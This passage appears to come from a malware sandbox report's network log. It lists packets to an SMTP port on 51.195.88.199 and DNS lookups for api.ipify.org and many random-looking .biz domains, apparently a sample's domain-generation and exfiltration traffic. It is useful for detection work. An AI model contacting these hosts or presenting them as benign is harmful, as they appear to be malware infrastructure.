Oct 20, 2024 18:43:14.072509050 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.072519064 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.072566032 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.072576046 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.073956013 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.073970079 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.073982954 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.074011087 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.074037075 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.074096918 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.074222088 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.074230909 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.074254036 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.074264050 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.074271917 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.076818943 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.076829910 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.076849937 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.076859951 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.076915979 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.076925993 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.076961040 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.076971054 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:14.900512934 CEST	587	50146	51.195.88.199	192.168.2.4
Oct 20, 2024 18:43:15.000408888 CEST	50146	587	192.168.2.4	51.195.88.199

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 20, 2024 18:41:12.016266108 CEST	65337	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:41:12.023854971 CEST	53	65337	1.1.1.1	192.168.2.4
Oct 20, 2024 18:41:12.205657959 CEST	54659	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:41:12.214590073 CEST	53	54659	1.1.1.1	192.168.2.4
Oct 20, 2024 18:41:12.897404909 CEST	59570	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:41:12.904422045 CEST	53	59570	1.1.1.1	192.168.2.4
Oct 20, 2024 18:41:13.197104931 CEST	52571	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:41:13.204436064 CEST	53	52571	1.1.1.1	192.168.2.4
Oct 20, 2024 18:41:15.166191101 CEST	59489	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:41:15.174012899 CEST	53	59489	1.1.1.1	192.168.2.4
Oct 20, 2024 18:41:16.407093048 CEST	53991	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:41:16.415081978 CEST	53	53991	1.1.1.1	192.168.2.4
Oct 20, 2024 18:41:17.074529886 CEST	60525	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:41:17.085668087 CEST	53	60525	1.1.1.1	192.168.2.4
Oct 20, 2024 18:41:18.618125916 CEST	63389	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:41:18.625870943 CEST	53	63389	1.1.1.1	192.168.2.4
Oct 20, 2024 18:41:19.028554916 CEST	56283	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:41:19.036453009 CEST	53	56283	1.1.1.1	192.168.2.4
Oct 20, 2024 18:41:20.748665094 CEST	59355	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:41:20.756107092 CEST	53	59355	1.1.1.1	192.168.2.4
Oct 20, 2024 18:41:22.062259912 CEST	61199	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:41:22.074918985 CEST	53	61199	1.1.1.1	192.168.2.4
Oct 20, 2024 18:41:23.952675104 CEST	53926	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:41:23.960261106 CEST	53	53926	1.1.1.1	192.168.2.4
Oct 20, 2024 18:41:24.102441072 CEST	59767	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:41:24.110521078 CEST	53	59767	1.1.1.1	192.168.2.4
Oct 20, 2024 18:41:24.111716032 CEST	53837	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:41:24.122941017 CEST	53	53837	1.1.1.1	192.168.2.4
Oct 20, 2024 18:41:26.023252964 CEST	62427	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:41:26.031457901 CEST	53	62427	1.1.1.1	192.168.2.4
Oct 20, 2024 18:41:26.032742977 CEST	50249	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:41:26.040333033 CEST	53	50249	1.1.1.1	192.168.2.4
Oct 20, 2024 18:41:27.624614000 CEST	60334	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:41:27.631894112 CEST	53	60334	1.1.1.1	192.168.2.4
Oct 20, 2024 18:41:27.632380009 CEST	60442	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:41:27.640486002 CEST	53	60442	1.1.1.1	192.168.2.4
Oct 20, 2024 18:41:27.641664982 CEST	49204	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:41:27.651263952 CEST	53	49204	1.1.1.1	192.168.2.4
Oct 20, 2024 18:41:29.164096117 CEST	62458	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:41:29.171266079 CEST	53	62458	1.1.1.1	192.168.2.4
Oct 20, 2024 18:41:29.172214031 CEST	56657	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:41:29.179774046 CEST	53	56657	1.1.1.1	192.168.2.4
Oct 20, 2024 18:41:29.180344105 CEST	64673	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:41:29.188765049 CEST	53	64673	1.1.1.1	192.168.2.4
Oct 20, 2024 18:41:33.058362961 CEST	55282	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:41:33.066204071 CEST	53	55282	1.1.1.1	192.168.2.4
Oct 20, 2024 18:41:40.987879038 CEST	54686	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:41:40.996071100 CEST	53	54686	1.1.1.1	192.168.2.4
Oct 20, 2024 18:41:44.509212971 CEST	54507	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:41:44.517258883 CEST	53	54507	1.1.1.1	192.168.2.4
Oct 20, 2024 18:41:44.593556881 CEST	57107	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:41:44.601511002 CEST	53	57107	1.1.1.1	192.168.2.4
Oct 20, 2024 18:41:48.191792965 CEST	52285	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:41:48.199065924 CEST	53	52285	1.1.1.1	192.168.2.4
Oct 20, 2024 18:41:50.424065113 CEST	52153	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:41:50.431921959 CEST	53	52153	1.1.1.1	192.168.2.4
Oct 20, 2024 18:41:53.073775053 CEST	51360	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:41:53.081427097 CEST	53	51360	1.1.1.1	192.168.2.4
Oct 20, 2024 18:41:56.042577982 CEST	54285	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:41:56.051780939 CEST	53	54285	1.1.1.1	192.168.2.4
Oct 20, 2024 18:41:59.290124893 CEST	59091	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:41:59.383965969 CEST	53	59091	1.1.1.1	192.168.2.4
Oct 20, 2024 18:41:59.899163961 CEST	57507	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:41:59.906891108 CEST	53	57507	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:01.925775051 CEST	58257	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:01.933233976 CEST	53	58257	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:03.274301052 CEST	55007	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:03.281583071 CEST	53	55007	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:03.295536995 CEST	60154	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:03.303178072 CEST	53	60154	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:04.899642944 CEST	53507	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:04.907668114 CEST	53	53507	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:06.650294065 CEST	55200	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:06.798998117 CEST	52775	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:06.806967020 CEST	53	52775	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:06.836894035 CEST	53	55200	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:07.976593971 CEST	50405	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:07.984553099 CEST	53	50405	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:10.094640970 CEST	63608	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:10.103024006 CEST	53	63608	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:10.416033030 CEST	59265	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:10.424431086 CEST	53	59265	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:12.345892906 CEST	63565	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:12.354573965 CEST	53	63565	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:13.295712948 CEST	49307	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:13.304079056 CEST	53	49307	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:14.955332041 CEST	54313	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:14.962502956 CEST	53	54313	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:15.273427963 CEST	51188	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:15.281528950 CEST	53	51188	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:16.846079111 CEST	57315	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:16.854008913 CEST	53	57315	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:16.926989079 CEST	61355	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:16.934036016 CEST	53	61355	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:18.679943085 CEST	52088	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:18.687854052 CEST	53	52088	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:19.216099977 CEST	60816	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:20.219284058 CEST	60816	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:20.316761017 CEST	56498	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:20.324955940 CEST	53	56498	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:20.449310064 CEST	53	60816	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:20.449321032 CEST	53	60816	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:22.743323088 CEST	54711	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:22.751544952 CEST	53	54711	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:24.029994965 CEST	55130	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:24.037859917 CEST	53	55130	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:24.990287066 CEST	54205	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:24.998553991 CEST	53	54205	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:26.120879889 CEST	60538	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:26.128545046 CEST	53	60538	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:27.410689116 CEST	57132	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:27.419081926 CEST	53	57132	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:28.186882019 CEST	54035	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:28.194195032 CEST	53	54035	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:30.572963953 CEST	55740	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:30.581362963 CEST	53	55740	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:30.859788895 CEST	54722	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:30.867654085 CEST	53	54722	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:32.627924919 CEST	56195	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:32.638122082 CEST	53	56195	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:33.241472006 CEST	61579	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:33.919821978 CEST	53	61579	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:35.082767963 CEST	58518	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:35.090266943 CEST	53	58518	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:36.593939066 CEST	56088	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:36.687151909 CEST	53	56088	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:36.948723078 CEST	54364	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:36.956882000 CEST	53	54364	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:39.893590927 CEST	64958	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:39.900892019 CEST	53	64958	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:40.317106962 CEST	49373	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:40.324548006 CEST	53	49373	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:40.325615883 CEST	52995	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:40.332752943 CEST	53	52995	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:41.954158068 CEST	55733	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:41.961503983 CEST	53	55733	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:42.386112928 CEST	63288	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:42.394593000 CEST	53	63288	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:44.124048948 CEST	60585	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:44.132838964 CEST	53	60585	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:46.064300060 CEST	64028	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:46.074402094 CEST	53	64028	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:47.681284904 CEST	61150	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:47.688571930 CEST	53	61150	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:47.883501053 CEST	62055	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:47.891428947 CEST	53	62055	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:49.770478010 CEST	65200	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:49.777803898 CEST	53	65200	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:51.323434114 CEST	62226	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:51.331166983 CEST	53	62226	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:52.694118977 CEST	53616	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:52.701785088 CEST	53	53616	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:52.908458948 CEST	50810	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:52.915668964 CEST	53	50810	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:52.977608919 CEST	51746	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:52.985380888 CEST	53	51746	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:55.358757019 CEST	59950	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:55.367780924 CEST	53	59950	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:57.026463985 CEST	49517	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:57.254477978 CEST	53	49517	1.1.1.1	192.168.2.4
Oct 20, 2024 18:42:57.350280046 CEST	63867	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:42:57.357388973 CEST	53	63867	1.1.1.1	192.168.2.4
Oct 20, 2024 18:43:00.444981098 CEST	58170	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:43:00.452827930 CEST	53	58170	1.1.1.1	192.168.2.4
Oct 20, 2024 18:43:01.121829033 CEST	65441	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:43:01.308326006 CEST	53	65441	1.1.1.1	192.168.2.4
Oct 20, 2024 18:43:03.579818010 CEST	49854	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:43:03.761405945 CEST	53	49854	1.1.1.1	192.168.2.4
Oct 20, 2024 18:43:04.032821894 CEST	60109	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:43:04.040132999 CEST	53	60109	1.1.1.1	192.168.2.4
Oct 20, 2024 18:43:04.823201895 CEST	58783	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:43:04.832154036 CEST	53	58783	1.1.1.1	192.168.2.4
Oct 20, 2024 18:43:06.235778093 CEST	53370	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:43:06.243293047 CEST	53	53370	1.1.1.1	192.168.2.4
Oct 20, 2024 18:43:09.088500023 CEST	51985	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:43:09.095763922 CEST	53	51985	1.1.1.1	192.168.2.4
Oct 20, 2024 18:43:12.266199112 CEST	52566	53	192.168.2.4	1.1.1.1
Oct 20, 2024 18:43:12.273518085 CEST	53	52566	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 20, 2024 18:41:12.016266108 CEST	192.168.2.4	1.1.1.1	0x1664	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:12.205657959 CEST	192.168.2.4	1.1.1.1	0x590e	Standard query (0)	pywolwnvd.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:12.897404909 CEST	192.168.2.4	1.1.1.1	0x47ac	Standard query (0)	pywolwnvd.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:13.197104931 CEST	192.168.2.4	1.1.1.1	0x2bdc	Standard query (0)	ssbzmoy.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:15.166191101 CEST	192.168.2.4	1.1.1.1	0x4756	Standard query (0)	ssbzmoy.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:16.407093048 CEST	192.168.2.4	1.1.1.1	0x52f2	Standard query (0)	cvgrf.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:17.074529886 CEST	192.168.2.4	1.1.1.1	0xa18	Standard query (0)	s82.gocheapweb.com	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:18.618125916 CEST	192.168.2.4	1.1.1.1	0xb723	Standard query (0)	cvgrf.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:19.028554916 CEST	192.168.2.4	1.1.1.1	0x1728	Standard query (0)	npukfztj.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:20.748665094 CEST	192.168.2.4	1.1.1.1	0xb020	Standard query (0)	npukfztj.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:22.062259912 CEST	192.168.2.4	1.1.1.1	0x329d	Standard query (0)	przvgke.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:23.952675104 CEST	192.168.2.4	1.1.1.1	0x5c55	Standard query (0)	przvgke.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:24.102441072 CEST	192.168.2.4	1.1.1.1	0x20ad	Standard query (0)	zlenh.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:24.111716032 CEST	192.168.2.4	1.1.1.1	0xbea4	Standard query (0)	knjghuig.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:26.023252964 CEST	192.168.2.4	1.1.1.1	0xbc10	Standard query (0)	zlenh.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:26.032742977 CEST	192.168.2.4	1.1.1.1	0x3db0	Standard query (0)	knjghuig.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:27.624614000 CEST	192.168.2.4	1.1.1.1	0x935c	Standard query (0)	uhxqin.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:27.632380009 CEST	192.168.2.4	1.1.1.1	0xcd73	Standard query (0)	anpmnmxo.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:27.641664982 CEST	192.168.2.4	1.1.1.1	0x390a	Standard query (0)	lpuegx.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:29.164096117 CEST	192.168.2.4	1.1.1.1	0x1645	Standard query (0)	uhxqin.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:29.172214031 CEST	192.168.2.4	1.1.1.1	0x50a9	Standard query (0)	anpmnmxo.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:29.180344105 CEST	192.168.2.4	1.1.1.1	0xa25a	Standard query (0)	lpuegx.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:33.058362961 CEST	192.168.2.4	1.1.1.1	0x12ee	Standard query (0)	vjaxhpbji.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:40.987879038 CEST	192.168.2.4	1.1.1.1	0xf668	Standard query (0)	xlfhhhm.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:44.509212971 CEST	192.168.2.4	1.1.1.1	0x50b5	Standard query (0)	vjaxhpbji.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:44.593556881 CEST	192.168.2.4	1.1.1.1	0x109f	Standard query (0)	ifsaia.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:48.191792965 CEST	192.168.2.4	1.1.1.1	0xd6ee	Standard query (0)	saytjshyf.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:50.424065113 CEST	192.168.2.4	1.1.1.1	0x1fa8	Standard query (0)	vcddkls.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:53.073775053 CEST	192.168.2.4	1.1.1.1	0x3f7a	Standard query (0)	fwiwk.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:56.042577982 CEST	192.168.2.4	1.1.1.1	0xa931	Standard query (0)	tbjrpv.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:59.290124893 CEST	192.168.2.4	1.1.1.1	0xbc2a	Standard query (0)	deoci.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:41:59.899163961 CEST	192.168.2.4	1.1.1.1	0xd524	Standard query (0)	xlfhhhm.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:01.925775051 CEST	192.168.2.4	1.1.1.1	0x7266	Standard query (0)	gytujflc.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:03.274301052 CEST	192.168.2.4	1.1.1.1	0x863a	Standard query (0)	qaynky.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:03.295536995 CEST	192.168.2.4	1.1.1.1	0xa668	Standard query (0)	ifsaia.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:04.899642944 CEST	192.168.2.4	1.1.1.1	0x2d9e	Standard query (0)	saytjshyf.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:06.650294065 CEST	192.168.2.4	1.1.1.1	0x47b2	Standard query (0)	bumxkqgxu.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:06.798998117 CEST	192.168.2.4	1.1.1.1	0xc59e	Standard query (0)	vcddkls.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:07.976593971 CEST	192.168.2.4	1.1.1.1	0x1ce7	Standard query (0)	dwrqljrr.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:10.094640970 CEST	192.168.2.4	1.1.1.1	0x7e6f	Standard query (0)	nqwjmb.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:10.416033030 CEST	192.168.2.4	1.1.1.1	0xb2b6	Standard query (0)	fwiwk.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:12.345892906 CEST	192.168.2.4	1.1.1.1	0x1484	Standard query (0)	tbjrpv.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:13.295712948 CEST	192.168.2.4	1.1.1.1	0xd391	Standard query (0)	ytctnunms.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:14.955332041 CEST	192.168.2.4	1.1.1.1	0x74e2	Standard query (0)	deoci.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:15.273427963 CEST	192.168.2.4	1.1.1.1	0x5bae	Standard query (0)	myups.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:16.846079111 CEST	192.168.2.4	1.1.1.1	0xb0ac	Standard query (0)	gytujflc.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:16.926989079 CEST	192.168.2.4	1.1.1.1	0xb304	Standard query (0)	oshhkdluh.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:18.679943085 CEST	192.168.2.4	1.1.1.1	0x5d5d	Standard query (0)	qaynky.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:19.216099977 CEST	192.168.2.4	1.1.1.1	0x9e9b	Standard query (0)	yunalwv.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:20.219284058 CEST	192.168.2.4	1.1.1.1	0x9e9b	Standard query (0)	yunalwv.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:20.316761017 CEST	192.168.2.4	1.1.1.1	0xf45b	Standard query (0)	bumxkqgxu.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:22.743323088 CEST	192.168.2.4	1.1.1.1	0x1245	Standard query (0)	jpskm.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:24.029994965 CEST	192.168.2.4	1.1.1.1	0x3276	Standard query (0)	dwrqljrr.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:24.990287066 CEST	192.168.2.4	1.1.1.1	0x2d10	Standard query (0)	lrxdmhrr.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:26.120879889 CEST	192.168.2.4	1.1.1.1	0xa58f	Standard query (0)	nqwjmb.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:27.410689116 CEST	192.168.2.4	1.1.1.1	0x6fb8	Standard query (0)	wllvnzb.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:28.186882019 CEST	192.168.2.4	1.1.1.1	0xbbb0	Standard query (0)	ytctnunms.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:30.572963953 CEST	192.168.2.4	1.1.1.1	0x93ed	Standard query (0)	myups.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:30.859788895 CEST	192.168.2.4	1.1.1.1	0xdada	Standard query (0)	gnqgo.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:32.627924919 CEST	192.168.2.4	1.1.1.1	0xb9fa	Standard query (0)	oshhkdluh.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:33.241472006 CEST	192.168.2.4	1.1.1.1	0xef81	Standard query (0)	jhvzpcfg.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:35.082767963 CEST	192.168.2.4	1.1.1.1	0x3f04	Standard query (0)	yunalwv.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:36.593939066 CEST	192.168.2.4	1.1.1.1	0x6bb4	Standard query (0)	acwjcqqv.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:36.948723078 CEST	192.168.2.4	1.1.1.1	0x2052	Standard query (0)	jpskm.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:39.893590927 CEST	192.168.2.4	1.1.1.1	0x7f3d	Standard query (0)	lrxdmhrr.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:40.317106962 CEST	192.168.2.4	1.1.1.1	0xa990	Standard query (0)	lejtdj.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:40.325615883 CEST	192.168.2.4	1.1.1.1	0x5ce4	Standard query (0)	vyome.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:41.954158068 CEST	192.168.2.4	1.1.1.1	0x29e0	Standard query (0)	yauexmxk.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:42.386112928 CEST	192.168.2.4	1.1.1.1	0x20d8	Standard query (0)	wllvnzb.biz	A (IP address)	IN (0x0001)	false
Oct 20, 2024 18:42:44.124048948 CEST	192.168.2.4	1.1.1.1	0xb2c6	Standard query (0)	iuzpxe.biz	A (IP address)	IN (0x0001)	false
